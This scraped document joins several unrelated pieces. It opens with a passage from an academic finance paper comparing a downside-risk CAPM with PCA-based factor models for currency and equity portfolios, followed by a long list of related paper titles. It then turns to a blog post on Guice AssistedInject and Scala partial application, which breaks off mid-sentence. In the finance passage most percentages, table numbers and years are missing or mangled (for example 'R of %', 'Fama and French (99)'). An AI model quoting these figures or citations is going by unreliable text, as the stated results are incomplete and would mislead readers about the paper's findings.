18 higher but noisier estimates of the price of risk compared to the higher threshold. In both cases, however, the prices of risk are statistically significant and the R are around %. Further robustness checks are provided in the online appendix. We verify that our results are robust to: using only developed countries currencies, wintering the data, varying the inflation threshold for the last currency portfolios, not imposing the restriction that the market return be exactly priced in sample, alternative measures of the market index, estimating the model on a longer sample (and relative subsamples) for equity markets, and to using the model specification in Ang et al. (6). V Factor Structure and PCA Based Models To further investigate the common factor structure in the joint cross-section of currencies, equities, and commodities we perform a principal component analysis (PCA) both on each asset class separately and on their joint returns. This analysis allows us to compare the DR-CAPM to the asset-class-specific PCA-based models that are prevalent in the literature. A. Currency PCA Model For currencies, the PCA analysis leads to the model of Lustig et al. (). Consistent with their work, we report in Panel A of Table that the first two principal components account for 7% of the time series variation of the interest-rate-sorted currency portfolios. The loadings of the first principal component reveal that it can be interpreted as a level factor because it loads on the returns of all currency portfolios similarly. Analogously, the loadings of the second principal component reveal that it can be interpreted as a slope factor because it loads on the differential return when going from portfolio to portfolio 6. Intuitively, these two principal components can be approximated by two portfolios: an equally weighted portfolio of all currencies in the sample against the dollar and a carry trade portfolio created by a long position in portfolio 6 and a short position in portfolio. We refer to these two portfolios as the dollar and carry portfolios, and denote their returns by RX cur and HML cur respectively. To confirm the intuition, Table 9 reports in the top left panel that the correlation between the first principal component and the dollar portfolio is % and the correlation between the second principal component and the carry portfolio is 9%. Table and Figure present the estimates of both the PCA-based linear model of Lustig et al. () and the DR-CAPM on the cross-section of currency returns. The LRV model explains 7
19 6% of the cross sectional variation in currency returns. The estimated price of risk is statistically significant for the carry portfolio but not for the dollar portfolio. The model is statistically rejected by the χ test on the pricing errors with a p-value of %. Notice that it is the slope factor, the carry portfolio, that carries most of the information relevant for the cross section. A model that only includes the first principal component, the level factor or dollar portfolio, generates a R of only %. Similarly to the DR-CAPM, the largest individual pricing error (-.%) for the LRV model is for the low-yield currency portfolios (portfolio ). The DR-CAPM captures the information contained in the principal components that is relevant for this cross section. Intuitively, the DR-CAPM summarizes the two principal components because the unconditional market return acts as a level factor while downside risk acts as a slope factor. To confirm this intuition, recall from Table 3 that the unconditional market betas are relatively similar across currency portfolios, so that all portfolios load similarly on the market. In contrast, the downside betas are more strongly increasing going from portfolio to portfolio 6, thus providing a slope factor. The top two panels in Table 9 confirm that the second principal component (or the carry portfolio) is more highly correlated with the market portfolio in downstates (% correlation), thus loading on downside risk, than it is unconditionally (9% correlation). The DR-CAPM produces a R of 73% and RMSPE of.% that are similar to the R of 6% and RMSPE of.% of the LRV model. B. Equity PCA model The PCA on the cross-section of equities provided by the 6 Fama & French portfolios sorted on size and book-to-market leads to the three factor model of Fama and French (99). Panel B in Table shows that the first three principal components account for 9% of the time series variation of the size and book-to-market sorted portfolios. The loadings of the first principal component reveal that it can be interpreted as a level factor because it loads on the returns of all equity portfolios similarly. The loadings of the second and third principal components reveal that they can be interpreted as two slope factors. The second principal component mainly loads on the differential return when going from small portfolios ( to 3) to big portfolios ( to 6). The third principal component mainly loads on the differential return when going from growth portfolios ( and ) to value portfolios (3 and 6). However, notice that the interpretation is not as clear as it is for currencies (nor as it is for commodities below). For example, the third principal component does not affect portfolio and in a way consistent with its interpretation as a factor affecting the value-growth trade-off in returns.
20 We approximate the first principal component with the market return and the next two principal components by the Fama & French factors: the small-minus-big portfolio and the high-minus-low portfolio. We denote the returns of these two portfolios as SMB and HML ff, respectively. Table 9 shows in the bottom left panel that the first principal component is highly correlated with the market (9% correlation), the second principal component is mainly related to the SMB return (% correlation), and the third principal component is mainly related to the HML ff return (% correlation). However, HML ff and SMB returns are themselves correlated and therefore do not correspond exactly to the two principal components that are by construction orthogonal to each other. Correspondingly, we find that HML ff is also correlated with the second principal component and SMB is correlated with the third principal component. 7 Table and Figure 6 present the estimates of both the PCA-based linear model of Fama and French (99) and the DR-CAPM on the cross section of equity returns. The Fama & French three factor model explains 6% of the cross sectional variation in returns. The estimated prices of risk are significant for the market and HML ff but not for SMB. The model is statistically rejected by the χ test on the joint pricing errors with a p-value of %. Notice that the cross-sectional performance of the model is driven by the third principal component, which is approximated by the HML ff factor. A model based only on the first two principal components, which are approximated by the market and SMB returns, generates a R of %. The DR-CAPM is unable to match the small-growth equity returns of portfolio (pricing error of -.%) and therefore produces a lower R (33%) than the Fama & French three-factor model. As noted by Campbell and Vuolteenaho (), it is typical in the literature to find that models cannot correctly price portfolio and a number of papers (Lamont and Thaler (3), D Avolio (), Mitchell, Pulvino, and Stafford ()) have questioned whether its return is correctly measured. In the last column of Table we show that once we remove portfolio from the 6 Fama & French portfolios the DR-CAPM performance improves: the R increases to 9% and the hypothesis of zero joint pricing errors cannot be rejected by the χ test at the % confidence level. 7 The correlation between HML ff and SMB helps to rationalize why the interpretation of the equity principal components in terms of mimicking portfolios is not as clear as it is for currencies or commodities. In the case of currencies and, as will shortly be illustrated, in the case of commodities, the proxy portfolios of the two principal components are themselves almost uncorrelated. For example, the correlation between RX cur and HML cur is only.7. Note that these papers refer to portfolio as the small-growth portfolio in the -portfolio sorting of Fama & French, while our first portfolio is the small-growth portfolio in the 6-portfolio sorting of Fama & French. Our first portfolio, therefore, includes more securities than those considered troublesome in the cited papers. In the appendix, however, we verify that the DR-CAPM mispricing of the first portfolio in our setting is due to the securities that are part of the three smallest growth portfolios in the -portfolio sorting. Our results, therefore are consistent with the previous evidence on small-growth stocks. 9
Online appendix to paper Downside Market Risk of Carry Trades
Online appendix to paper Downside Market Risk of Carry Trades A1. SUB-SAMPLE OF DEVELOPED COUNTRIES I study a sub-sample of developed countries separately for two reasons. First, some of the emerging countries
Downside market risk of carry trades
Downside market risk of carry trades Victoria Dobrynskaya 1 First version: March 2010 This version: March 2013 Abstract Carry trades consistently generate high excess returns with high Sharpe ratios. I
B.3. Robustness: alternative betas estimation
Appendix B. Additional empirical results and robustness tests This Appendix contains additional empirical results and robustness tests. B.1. Sharpe ratios of beta-sorted portfolios Fig. B1 plots the Shar
Probability Weighting of Rare Events and Currency Returns
Probability Weighting of Rare Events and Currency Returns Fousseni Chabi-Yo and Zhaogang Song March 17, 2013 Currency Returns: Carry Trade Strategy Currency carry trade strategy: borrow in countries with
Betting Against Beta
Betting Against Beta Andrea Frazzini AQR Capital Management LLC Lasse H. Pedersen NYU, CEPR, and NBER Preliminary Copyright 2010 by Andrea Frazzini and Lasse H. Pedersen Motivation Background: Security paper Carry Trade in Industrialized and Emerging Markets
The Carry Trade in Industrialized and Emerging Markets Craig Burnside January 2014 Abstract I revisit the evidence on the profits associated with currency carry trades, explore its relationship to the,,
Answers to Concepts in Review
Answers to Concepts in Review 1. A portfolio is simply a collection of investments assembled to meet a common investment goal. An efficient portfolio is a portfolio offering the highest expected return
INVESTMENTS Classes 8 & 9: The Equity Market Cross Sectional Variation in Stock Returns. Spring 2003
15.433 INVESTMENTS Classes 8 & 9: The Equity Market Cross Sectional Variation in Stock Returns Spring 2003 Introduction Equities are common stocks, representing ownership shares of a corporation. Two
Downside Risk in Stock and Currency Markets
The London School of Economics and Political Science Downside Risk in Stock and Currency Markets Victoria V. Dobrynskaya A thesis submitted to the Department of Finance of the London School of Economics
Stock market booms and real economic activity: Is this time different?
International Review of Economics and Finance 9 (2000) 387 415 Stock market booms and real economic activity: Is this time different? Mathias Binswanger* Institute for Economics and the Environment, University
Carry Trades and Currency Crashes: A Comment
Carry Trades and Currency Crashes: A Comment Craig Burnside y July 2008 Abstract The failure of uncovered interest parity and the pro tability of the carry trade in currencies are intimately related,
NBER WORKING PAPER SERIES THE CROSS-SECTION OF FOREIGN CURRENCY RISK PREMIA AND CONSUMPTION GROWTH RISK: A REPLY. Hanno Lustig Adrien Verdelhan
NBER WORKING PAPER SERIES THE CROSS-SECTION OF FOREIGN CURRENCY RISK PREMIA AND CONSUMPTION GROWTH RISK: A REPLY Hanno Lustig Adrien Verdelhan Working Paper 13812 NATIONAL
Internet Appendix to Who Gambles In The Stock Market?
Internet Appendix to Who Gambles In The Stock Market? In this appendix, I present background material and results from additional tests to further support the main results reported in the paper. A. Profile
Chap 3 CAPM, Arbitrage, and Linear Factor Models
Chap 3 CAPM, Arbitrage, and Linear Factor Models 1 Asset Pricing Model a logical extension of portfolio selection theory is to consider the equilibrium asset pricing consequences of investors individually
Integration of the Mexican Stock Market. Abstract
Integration of the Mexican Stock Market Alonso Gomez Albert Department of Economics University of Toronto Version 02.02.06 Abstract In this paper, I study the ability of multi-factor asset pricing models
Foreign Exchange Trading Strategies and Rare Events
Foreign Exchange Trading Strategies and Rare Events Jason Cen and Ian W. Marsh Cambridge Judge Business School and Cass Business School February 15, 2016 Abstract We study the properties of carry trade
Common Risk Factors in Currency Markets
Common Risk Factors in Currency Markets Hanno Lustig UCLA Anderson and NBER Nick Roussanov Wharton Adrien Verdelhan Boston University and NBER April 2009 Abstract We identify a slope factor in exchange
Optimal Debt-to-Equity Ratios and Stock Returns
Utah State University DigitalCommons@USU All Graduate Plan B and other Reports Graduate Studies 3-2014 Optimal Debt-to-Equity Ratios and Stock Returns Courtney D. Winn Utah State University Follow
Chicago Booth BUSINESS STATISTICS 41000 Final Exam Fall 2011
Chicago Booth BUSINESS STATISTICS 41000 Final Exam Fall 2011 Name: Section: I pledge my honor that I have not violated the Honor Code Signature: This exam has 34 pages. You have 3 hours to complete this
CFA Examination PORTFOLIO MANAGEMENT Page 1 of 6
PORTFOLIO MANAGEMENT A. INTRODUCTION RETURN AS A RANDOM VARIABLE E(R) = the return around which the probability distribution is centered: the expected value or mean of the probability distribution of possible
GOVERNMENT PENSION FUND GLOBAL HISTORICAL PERFORMANCE AND RISK REVIEW
GOVERNMENT PENSION FUND GLOBAL HISTORICAL PERFORMANCE AND RISK REVIEW 10 March 2014 Content Scope... 3 Executive summary... 3 1 Return and risk measures... 4 1.1 The GPFG and asset class returns... 4 1.2
Life Cycle Asset Allocation A Suitable Approach for Defined Contribution Pension Plans
Life Cycle Asset Allocation A Suitable Approach for Defined Contribution Pension Plans Challenges for defined contribution plans While Eastern Europe is a prominent example of the importance of defined:
RISKS IN MUTUAL FUND INVESTMENTS
RISKS IN MUTUAL FUND INVESTMENTS Classification of Investors Investors can be classified based on their Risk Tolerance Levels : Low Risk Tolerance Moderate Risk Tolerance High Risk Tolerance Fund Portfolio Theory and Other Asset Pricing Models
Chapter 7 Portfolio Theory and Other sset Pricing Models NSWERS TO END-OF-CHPTER QUESTIONS 7-1 a. portfolio is made up of a group of individual assets held in combination. n asset that would be relatively
27 Week 9. Term structure I Expectations Hypothesis and Bond Risk Premia Notes
7 Week 9. Term structure I Expectations Hypothesis and Bond Risk Premia Notes 1. Background: We re back to regressions +1 = + + +1 to forecast returns. We will connect them to portfolios, a job that is
Incorporating Commodities into a Multi-Asset Class Risk Model
Incorporating Commodities into a Multi-Asset Class Risk Model Dan dibartolomeo, Presenting Research by TJ Blackburn 2013 London Investment Seminar November, 2013 Outline of Today s Presentation Institutional
Tilted Portfolios, Hedge Funds, and Portable Alpha
MAY 2006 Tilted Portfolios, Hedge Funds, and Portable Alpha EUGENE F. FAMA AND KENNETH R. FRENCH Many of Dimensional Fund Advisors clients tilt their portfolios toward small and value stocks. Relative
Currency Momentum Strategies
Currency Momentum Strategies Lukas Menkhoff Lucio Sarno Maik Schmeling Andreas Schrimpf Abstract We provide a broad empirical investigation of momentum strategies in foreign exchange markets. We find a
Option-implied Betas and Cross Section of Stock Returns
Option-implied Betas and Cross Section of Stock Returns Richard D. F. Harris and Qiao Fang This Version: September 2014 ABSTRACT On the basis of Buss and Vilkov (2012), we further compare different option-implied.
Do Implied Volatilities Predict Stock Returns?
Do Implied Volatilities Predict Stock Returns? Manuel Ammann, Michael Verhofen and Stephan Süss University of St. Gallen Abstract Using a complete sample of US equity options, we find a positive, highly
Variance Risk Premium and Cross Section of Stock Returns
Variance Risk Premium and Cross Section of Stock Returns Bing Han and Yi Zhou This Version: December 2011 Abstract We use equity option prices and high frequency stock prices to estimate stock s variance
A new measure of equity and cash flow duration: The duration-based explanation of the value premium revisited
A new measure of equity and cash flow duration: The duration-based explanation of the value premium revisited David Schröder Birkbeck College, University of London Florian Esterer Bank J. Safra Sarasin
EVALUATION OF THE PAIRS TRADING STRATEGY IN THE CANADIAN MARKET
EVALUATION OF THE PAIRS TRADING STRATEGY IN THE CANADIAN MARKET By Doris Siy-Yap PROJECT SUBMITTED IN PARTIAL FULFILLMENT OF THE REQUIREMENTS FOR THE DEGREE OF MASTER IN BUSINESS ADMINISTRATION Approval
Rethinking Fixed Income
Rethinking Fixed Income Challenging Conventional Wisdom May 2013 Risk. Reinsurance. Human Resources. Rethinking Fixed Income: Challenging Conventional Wisdom With US Treasury interest rates at, or near,:
THE PRICING OF RISK IN THE CARRY TRADE
THE PRICING OF RISK IN THE CARRY TRADE by Wenna Lu A Thesis Submitted in Fulfilment of the Requirements for the Degree of Doctor of Philosophy of Cardiff University Economics Section of Cardiff Business,
The Cross-Section of Volatility and Expected Returns
THE JOURNAL OF FINANCE VOL. LXI, NO. 1 FEBRUARY 2006 The Cross-Section of Volatility and Expected Returns ANDREW ANG, ROBERT J. HODRICK, YUHANG XING, and XIAOYAN ZHANG ABSTRACT We examine the pricing)
Is momentum really momentum?
Is momentum really momentum? Robert Novy-Marx Abstract Momentum is primarily driven by firms performance 12 to seven months prior to portfolio formation, not by a tendency of rising and falling stocks
Salvaging the C-CAPM: Currency Carry Trade Risk Premia and Conditioning Information
Salvaging the C-CAPM: Currency Carry Trade Risk Premia and Conditioning Information Abhay Abhyankar y, Angelica Gonzalez z, Olga Klinkowska x, This version: December 2011 First Version: Sept 2011 Abstract
An Empirical Analysis of Insider Rates vs. Outsider Rates in Bank Lending
An Empirical Analysis of Insider Rates vs. Outsider Rates in Bank Lending Lamont Black* Indiana University Federal Reserve Board of Governors November 2006 ABSTRACT: This paper analyzes empirically
CHAPTER 10 RISK AND RETURN: THE CAPITAL ASSET PRICING MODEL (CAPM)
CHAPTER 10 RISK AND RETURN: THE CAPITAL ASSET PRICING MODEL (CAPM) Answers to Concepts Review and Critical Thinking Questions 1. Some of the risk in holding any asset is unique to the asset in question.
Cost of Capital, Valuation and Strategic Financial Decision Making
Cost of Capital, Valuation and Strategic Financial Decision Making By Dr. Valerio Poti, - Examiner in Professional 2 Stage Strategic Corporate Finance The financial crisis that hit financial markets in
Common Risk Factors in Currency Markets
Common Risk Factors in Currency Markets Hanno Lustig UCLA Anderson and NBER Nick Roussanov Wharton June 4, 2008 Adrien Verdelhan Boston University Abstract Currency excess returns are highly predictable,,
Models of Risk and Return
Models of Risk and Return Aswath Damodaran Aswath Damodaran 1 First Principles Invest in projects that yield a return greater than the minimum acceptable hurdle rate. The hurdle rate should be higher
Firm Fundamentals and Variance Risk Premiums
Firm Fundamentals and Variance Risk Premiums Matthew R. Lyle and James P. Naughton August 2015 Abstract We develop and empirically test an accounting-based model that ties two firm characteristics, book-to-market
|
http://docplayer.net/77900-Conditional-risk-premia-in-currency-markets-and-other-asset-classes.html
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
.
One window of opportunity to do exactly that has opened in the past few years. Clojure, a modern variant of Lisp that runs on the Java virtual machine (JVM), has been taking the programming world by storm. It's a real Lisp, which means that it has all of the goodness you would want and expect: functional programming paradigms, easy use of complex data structures and even such advanced facilities as macros. Unlike other Lisps, and contributing in no small part to its success, Clojure sits on top of the JVM, meaning that it can interoperate with Java objects and also work in many existing environments.
In this article, I want to share some of my experiences with starting to experiment with Clojure for Web development. Although I don't foresee using Clojure in much of my professional work, I do believe it's useful and important always to be trying new languages, frameworks and paradigms. Clojure combines Lisp and the JVM in just the right quantities to make it somewhat mainstream, which makes it more interesting than just a cool language that no one is really using for anything practical.
Clojure Basics
Clojure, as I mentioned above, is a version of Lisp that's based on the JVM. This means if you're going to run Clojure programs, you're also going to need a copy of Java. Fortunately, that's not much of an issue nowadays, given Java's popularity. Clojure itself comes as a Java archive (JAR) file, which you then can execute.
But, given the number of Clojure packages and libraries you'll likely want to use, you would be better off using Leiningen, a package manager for installing Clojure and Clojure-related packages. (The name is from a story, "Leiningen and the Ants", and is an indication of how the Clojure community doesn't want to use the established dependency-management system, Ant.) You definitely will want to install Leiningen. If your Linux distribution doesn't include a modern copy already, you can download the shell script from.
Execute this shell script, putting it in your PATH. After you download the Leiningen jarfile, it will download and install Leiningen in your ~/.lein directory (also known as LEIN_HOME). That's all you need in order to start creating a Clojure Web application.
With Leiningen installed, you can create a Web application. But in
order to do that, you'll need to decide which framework to use.
Typically, you create a new Clojure project with
lein new, either
naming the project on which you want to work (
lein new
myproject),
or by naming the template you wish to copy and then the name of the
project (
lein new mytemplate myproject). You can get a list of
existing templates by executing
lein help new or by looking at the site, a repository for Clojure jarfiles and libraries.
You also can open an REPL (read-eval-print loop) in order to communicate directly with Clojure. I'm not going to go into all the details here, but Clojure supports all the basic data types you would expect, some of which are mapped to Java classes. Clojure supports integers and strings, lists and vectors, maps (that is, dictionaries or hashes) and sets. And like all Lisps, Clojure indicates that you want to evaluate (that is, run) code by putting it inside parentheses and putting the function name first. Thus, you can say:
(println "Hello") (println (str "Hello," " " "Reuven")) (println (str (+ 3 5)))
You also can assign variables in Clojure. One of the important things to know about Clojure is that all data is immutable. This is somewhat familiar territory for Python programmers, who are used to having some immutable data types (for example, strings and tuples) in the language. In Clojure, all data is immutable, which means that in order to "change" a string, list, vector or any other data type, you really must reassign the same variable to a new piece of data. For example:
user=> (def person "Reuven") #'user/person user=> (def person (str person " Lerner")) #'user/person user=> person "Reuven Lerner"
Although it might seem strange to have all data be immutable, this tends to reduce or remove a large number of concurrency problems. It also is surprisingly natural to work with given the number of functions in Clojure that transform existing data and the ability to use "def" to define things.
You also can create maps, which are Clojure's implementation of hashes or dictionaries:
user=> (def m {:a 1 :b 2}) #'user/m user=> (get m :a) 1 user=> (get m :x) nil
You can get the value associated with the key "x", or a default if you prefer not to get nil back:
user=> (get m :x "None") "None"
Remember, you can't change your map, because data in Clojure is immutable. However, you can add it to another map, the values of which will override yours:
user=> (assoc m :a 100) {:a 100, :b 2}
One final thing I should point out before diving in is that you
can (of course) create functions in Clojure. You can create an
anonymous function with
fn:
(fn [first second] (+ first second))
The above defines a new function that takes two parameters and adds
them together. However, it's usually nice to put these into a named
function, which you can do with
def:
user=> (def add (fn [first second] (+ first second))) #'user/add user=> (add 5 3) 8
Because this is common, you also can use the
defn macro, which
combines
def and
fn together:
user=> (add 5 3) 8 user=> (defn add [first second] (+ first second)) #'user/add user=> (add 5 3) 8.
|
http://www.linuxjournal.com/content/intro-clojure-web?page=0,0&quicktabs_1=1
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
There are a few blog posts about Python that show how easy it is. Many of them are more from a developer view in my opinion so many basis people may not even consider reading through them. Consequently they will be missing out on a great opportunity to make their lifes easier and their work more efficient. I hope you enjoy this first part. There will be more depending on the time I have.
The Teaser
Scripting repetitive activities like a system copy or SAP refresh validation or other activities makes perfect sense. The problem is that many of the scripts developed over the years are not very reusable. One customer runs on Unix/Oracle, the next Windows/MSSQL and another perhaps DB2.
Ever since I came across Python I am simply blown away by how simple it is to create complex scripts even including GUIs and SAP integration. One of the refresh scripts I developed at one of my clients was written in VB script for Windows and SQL Server. The script was huge, complicated and very difficult to maintain for the “uninitiated”. The same functionality in Python would have been possible with a script less than 1/10th the number of lines. On top of that it would have been platform and even database independent! It would have also taken only a fraction of the time I required for the VBS script and would have been maintainable by almost to everybody.
For example these lines create a connection object to logon to SAP:
from pyrfc import Connection
conn = Connection(user=<username>,
passwd=<password>,
ashost=<hostname>,
sysnr=<system number>,
client=<client>)
Two commands and that’s it. From that point on, “conn” will be the name of the SAP connection object that can be used to interact with the SAP instance and allows you to do many really cool things. For example schedule a program as background job:
result_open = conn.call(‘SUBST_SCHEDULE_BATCHJOB’,
JOBNAME=<jobname>,
REPNAME=<program>,
VARNAME=<variant>,
AUTHCKNAM=<username>,
SDLSTRTTM=datetime.time(<hour>,<minute>,<second>),
STRTIMMED=’X’)
3 lines of code to schedule a background job using a simple script. Let’s look at some of the really good example in the SCN that demonstrate how to use perl for basis tasks: Perl and SAP Adventures, Part 2
The perl script looks like this:
#!/usr/bin/perl -w
use strict;
use sapnwrfc; # load the SAPNW::Rfc module
SAPNW::Rfc->load_config; # load connection parameters
my $rfc = SAPNW::Rfc->rfc_connect; # connect to SAP system
my $rcb = $rfc->function_lookup(“TH_SERVER_LIST”); # look up the function module
my $tsl = $rcb->create_function_call; # create the function call
$tsl->invoke; # execute the function call
foreach my $row (@{$tsl->LIST}) { # loop through each row in LIST array
print “Server is $row->{‘NAME’}”; # print the server NAME value for each
}
$rfc->disconnect();
This is already easy but for someone that has never seen perl there are a lot of weird looking characters in the mix. Let’s do this in Python:
#!/usr/bin/python
from pyrfc import Connection # load the pyrfc.Connection method
conn = Connection(user=<username>, # logon to SAP
passwd=<password>,
ashost=<hostname>,
sysnr=<system number>,
client=<client>)
result=conn.call(‘TH_SERVER_LIST’) # execute the function module
for server in result[‘LIST’]: # loop over each row in the LIST list
print “Server is ” + server[‘NAME’] # print the NAME value for each server
conn.close() # close the connection
Simple, elegant an very easy to read and understand.
What you need
You don’t need a lot to get started:
- Obviosuly Python. If it’s not already part of your OS you can download it from Python.org. You need version 2.7.6 since SAP’s pyrfc module is only avaiable for that version. Python 3.4 is not supported (yet?). There are also python bundles available that have a lot of modules already bundled in. There is also a portable Python version that does not require installation called WinPython.
- The PyRFC module: PyRFC – The Python RFC Connector . The module has excellent installation instructions. just follow them step by step. You may be required to download additional python modules to get the PyRFC module going.
- Depending on what you want to do you may need other modules. For example the logger module for easy logging, or something to generate HTML coding. The amount available modules are endless in case the already vast standard functionality is not sufficient.
- It will be easier to use a dedicated Python IDE (Integrated Development Environment). Syntax highlighting and context sensitive online help makes the development even easier. An overview of the different IDEs available can be found in this article: Comparison of Python IDEs for Development | Python Central. I personally use PyCharm but sometimes it can be annoyingly slow to start.
Another thing is training and documentation. There are many, many books and online courses available for free. For example Google’s Python Class Or the free offerings from Codecademy. Or just work your way through the tons of example coding that is available all over the Internet.
Start with something useful: List of delta transports for a System Copy
We want to perform a system copy to refresh the QA system from the production system as part of a dress rehearsal. After the system copy we need to import the transports that were in QA system but didn’t make it to production yet. The way that is described here does not necessarily mean that it works for your environment. So don’t accept this thing blindly without checking, actually better assume this script is not working at all and test it out in your environment.
Here are the steps we need to accomplish:
- Logon to the source (PRD) and the target system (QAS)
- download tables TPALOG from both systems
- determine which transports are missing in the PRD system
- determine the sequence of the missing transports
- print the missing transports in the sequence they need to get applied.
Logging on
In this example we will store the logon information in a text file. This example the text contains a password stored in clear text. That’s obviously not a good thing. In some later parts we will discuss ways around this but for now let’s stick with this approach. This is the text file:
[target]
user = TESTUSER
passwd = A very secure password!
ashost = qasp00
client = 020
sysnr = 00
sid = QAS
[source]
user = TESTUSER
passwd = A very secure password, too!
ashost = prdpp00
client = 020
sysnr = 00
sid = PRD
The file syntax corresponds to a standard windows .ini file. The configuration section is stored in “[ ]” and its values below it. The file should reside in the same directory as the script with the name ‘sapsystems.cfg’. It gets read by the Module ConfigParser which returns a dictionary object consisting of the values that belong to a configuration item.
The Script
from pyrfc import Connection
from ConfigParser import ConfigParser
config = ConfigParser()
config.read(‘sapsystems.cfg’)
source_transports = []
target_transports = []
params_source=config._sections[‘source’] #read the logon information of the source system
params_target=config._sections[‘target’] #read the logon information of the target system
target_conn = Connection(user=params_target[‘user’],
passwd=params_target[‘passwd’],
ashost=params_target[‘ashost’],
client=params_target[‘client’],
sysnr=params_target[‘sysnr’],
sid=params_target[‘sid’])
# that’s a lot of typing. The connection information is returned in a data
# structure called ‘dictionary’. Using the following syntax we basically ‘unpack’
# the content of the structure and make this whole thing a lot simpler:
source_conn = Connection(**params_source)
# The information we need is stored in table TPALOG. since we don’t
# want to download the entire table, we need to restrict the returned
# records. We are going to use funtion module RFC_READ_TABLE for this.
# the where clause there is stored in ABAP syntax. That means we need
# these statements:
target_where = “TARSYSTEM EQ ‘” + params_target[‘sid’] + \
“‘ AND TRSTEP EQ ‘I'”
source_where = “TARSYSTEM EQ ‘” + params_source[‘sid’] + \
“‘ AND TRSTEP EQ ‘I'”
# now let’s read the data for the target system
target_result = target_conn.call(‘RFC_READ_TABLE’,
QUERY_TABLE=’TPALOG’,
DELIMITER=’|’,
OPTIONS = [{‘TEXT’:target_where}])
# we are going to store the transports in a ‘set’. A set can do
# lots of things that would otherwise very difficult to perform
# otherwise
list_transports_sequence=list()
# the following list will be used for the sequence later on
target_transports=set()
for row in target_result[‘DATA’]:
splitrow=row[‘WA’].split(‘|’)
# here we add the transport to the set
target_transports.update(str(splitrow[1].strip()))
# and here we append the import date and the transport as dictionary
# to the list of all transports
list_transports_sequence.append(dict(date=splitrow[0].strip(),
transport=splitrow[1].strip()))
source_result = source_conn.call(‘RFC_READ_TABLE’,
QUERY_TABLE=’TPALOG’,
DELIMITER=’|’,
OPTIONS = [{‘TEXT’:source_where}])
# the same for the transports in the source system
source_transports=set()
for row in source_result[‘DATA’]:
splitrow=row[‘WA’].split(‘|’)
source_transports.update(str(splitrow[1].strip()))
# now one of the cool things to do with sets:
missing_transports = target_transports – source_transports
# the returned set ‘missing_transports’ contains the list of
# transports that were imported into QAS but never made it to
# production. In the next step we need to determine the import sequence
for transport in missing_transports:
# at first we delete all transports from the list of imported
# transports that were imported into both systems already
list_transports_sequence[:] = [dic for dic in list_transports_sequence \
if dic.get(‘transport’) != transport]
print(“Missing transports in the sequence in which they need to get applied:”)
# we need to order the list of the transports by import date.
for transport in sorted(list_transports_sequence,key= lambda tp: tp[‘date’]):
print(transport[‘transport’])
This is an excellent example.Thank you very much for this.
I executed the example, trying to include a limit by TRTIME. But the response I got was:
Then after a lot of searching I realized that the TEXT option is limited to 72 characters. I had to break the where clause into smaller chunks and pass a list of TEXT options.
SAP note 382318 states that:
Avoid to use the external generic table access (with function module RFC_READ_TABLE) in your solutions. The function is not meant to be publicly used.
What is an alternative to RFC_READ_TABLE that can be used to query already imported transports?
Kind regards,
Nikos.
Hi,
I’m not aware of any officially SAP supported generic table reader function module. There is function module TABLE_ENTRIES_GET_VIA_RFC but it has the same comments regarding SAP support as RFC_READ_TABLE. It has the advantage to support a row length of 2048 characters I think.
In your case it won’t help since the where clause field ‘SEL_TAB’ has the same length restriction as RFC_READ_TABLE.
If that is not sufficient, then an ABAP developer may need to write a custom solution for your requirements.
Best regards
Lars
Thanks Lars.
For anyone interested, a long where clause can be broken down in smaller chunks like this:
import textwrap
long_where_clause = (“TARSYSTEM EQ ‘XXX’ AND TRSTEP EQ ‘I’ “
“AND TRCLI EQ ‘999’ AND TRTIME GE ‘20141201232323’”)
OPTIONS = [{‘TEXT’: line} for line in textwrap.wrap(long_where_clause, 72)]
|
https://blogs.sap.com/2014/05/04/python-for-basis/
|
CC-MAIN-2017-43
|
en
|
refinedweb
|
It so happens that these days possibly I have started looking at things a bit differently. I have been programming more in Scala and Clojure and being exposed to many of the functional paradigms that they encourage and espouse, it has stated manifesting in the way I think of programming. In this post I will look into dependency injection on a different note. At the end of it may be we will see that this is yet another instance of a pattern melding into the chores of a powerful language's idiomatic use.
In one of my projects I have a class whose constructor has some of its parameters injected and the others manually provided by the application. Guice has a nice extension that does this for you - AssistedInject. It writes the boilerplate stuff by generating an implementation of the factory. You just need to annotate the implementation class' constructor and the fields that aren't known to the injector. Here's an example from the Guice page ..
public class RealPayment implements Payment {
@Inject
public RealPayment(
CreditService creditService, // injected
AuthService authService, // injected
@Assisted Date startDate, // caller to provide
@Assisted Money amount); // aller to provide
}
...
}
Then in the Guice module we bind a
Provider<Factory>..
bind(PaymentFactory.class).toProvider(
FactoryProvider.newFactory(
PaymentFactory.class, RealPayment.class));
The
FactoryProvidermaps the
create()method's parameters to the corresponding
@Assistedparameters in the implementation class' constructor. For the other constructor arguments, it asks the regular
Injectorto provide values.
So the basic issue that
AssistedInjectsolves is to finalize (close) some of the parameters at the module level to be provided by the injector, while keeping the abstraction open for the rest to be provided by the caller.
On a functional note this sounds a lot like currying .. The best rationale for currying is to allow for partial application of functions, which does the same thing as above in offering a flexible means of keeping parts of your abstraction open for later pluggability.
Consider the above abstraction modeled as a case class in Scala ..
trait CreditService
trait AuthService
case class RealPayment(creditService: CreditService,
authService: AuthService,
startDate: Date,
amount: Int)
One of the features of a Scala case class is that it generates a companion object automatically along with an apply method that enables you to invoke the class constructor as a function object ..
val rp = RealPayment( //..
is in fact a syntactic sugar for
RealPayment.apply( //.. that gets called implicitly. But you know all that .. right ?
Now for a particular module , say I would like to finalize on
PayPalas the
CreditServiceimplementation, so that the users don't have to pass this parameter repeatedly - just like the injector of your favorite dependency injection provider. I can do this as follows in a functional way and pass on a partially applied function to all users of the module ..
scala> case class PayPal(provider: String) extends CreditService
defined class PayPal
scala> val paypalPayment = RealPayment(PayPal("bar"), _: AuthService, _: Date, _: Int)
paypalPayment: (AuthService, java.util.Date, Int) => RealPayment = <function>
Note how the Scala interpreter now treats
paypalPaymentas a function from
(AuthService, java.util.Date, Int) => RealPayment. The underscore acts as the placeholder that helps Scala create a new function object with only those parameters. In our case the new functional takes only three parameters for whom we used the placeholder syntax. From your application point of view what it means is that we have closed the abstraction partially by finalizing the provider for the
CreditServiceimplementation and left the rest of it open. Isn't this precisely what the Guice injector was doing above injecting some of the objects at module startup ?
Within the module I can now invoke
paypalPaymentwith only the 3 parameters that are still open ..
scala> case class DefaultAuth(provider: String) extends AuthService
defined class DefaultAuth
scala> paypalPayment(DefaultAuth("foo"), java.util.Calendar.getInstance.getTime, 10000)
res0: RealPayment = RealPayment(PayPal(foo),DefaultAuth(foo),Sun Feb 28 15:22:01 IST 2010,10000)
Now suppose for some modules I would like to close the abstraction for the
